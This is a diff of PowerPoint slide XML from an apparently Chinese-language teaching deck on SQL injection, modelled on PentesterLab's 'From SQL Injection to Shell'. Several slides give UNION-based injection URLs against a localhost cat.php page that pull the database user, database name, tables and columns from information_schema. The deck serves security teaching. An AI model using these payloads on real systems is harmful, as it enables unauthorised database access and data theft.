+              <a:t>current_user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>()</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>和</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>database()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0"/>
+              <a:t>the current user:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,current</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>user(),</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>3,4</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="图片 5"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="4090844"/>
+            <a:ext cx="8313334" cy="1845932"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058395911"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899594273"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8366,101 +8806,188 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>和利用</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="1327385"/>
+            <a:ext cx="10840597" cy="3940365"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>参考资料</a:t>
+              <a:t>试信息：</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>From SQL Injection to </a:t>
-            </a:r>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>Shell  --</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
-              <a:t>PentesterLab</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>利用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>MYSQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>自带的函数</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>version(),</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>current_user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>()</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>和</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>database()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>the current database</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,database(),</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>3,4</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入攻击的种类和防范</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>手段  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>--</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>IT</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>专家</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>网</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="图片 3"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913148" y="4092409"/>
+            <a:ext cx="7577071" cy="1817072"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4289169302"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3568894894"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8499,8 +9026,219 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="759539" y="166826"/>
+            <a:off x="913774" y="398179"/>
             <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1298499" y="1905918"/>
+            <a:ext cx="9595002" cy="4032174"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>当</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>一个攻击者通过在查询语句中插入一系列的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句来将数据写入到应用程序中，这种方法就可以定义成</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
+              <a:t>从一个数据库获得未经授权的访问和直接检索</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>”，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入攻击就其本质而言，它利用的工具是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>的语法，针对的是应用程序开发者编程过程中的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>漏洞</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
+              <a:t>当攻击者能够操作数据，往应用程序中插入一些</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
+              <a:t>语句时，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
+              <a:t>注入攻击就发生了</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>”。实际上，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注入是存在于常见的多连接的应用程序中一种漏洞，攻击者通过在应用程序中预先定义好的查询语句结尾加上额外的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句元素，欺骗数据库服务器执行非授权的任意查询。这类应用程序一般是网络应用程序</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>(Web Application)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>，它允许用户输入查询条件，并将查询条件嵌入</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>请求语句中，发送到与该应用程序相关联的数据库服务器中去执行。通过构造一些畸形的输入，攻击者能够操作这种请求语句去获取预先未知的结果。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291241549"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="462083" y="1685580"/>
+            <a:ext cx="11017493" cy="4671152"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -8509,195 +9247,1897 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>利用返回的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>meta-information</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
+              <a:t>构建最终</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
+              <a:t>请求</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>从</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>MySQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>版本</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>开始，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>MySQL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>提供关于数据库、表、列的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>meta-information</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>，这些信息储存在</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>information_schema</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>数据库里</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>the list of tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>localhost/cat.php?id=1%20UNION%20SELECT%201,table</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
+              <a:t>name,3,4%20FROM%20information</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>schema.tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>1 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION SELECT 1,table_name,3,4 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>information_schema.tables</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>the list of columns</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,column_name,3,4%20FROM%20information_schema.columns</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="254657"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
               <a:t>SQL</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
-              <a:t>注入 原理</a:t>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
+              <a:t>注入和利用</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="946825" y="1938969"/>
-            <a:ext cx="10363826" cy="4043189"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>基于</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>B/S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>（</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Browser/Server</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，浏览器</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器模式）</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>应用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
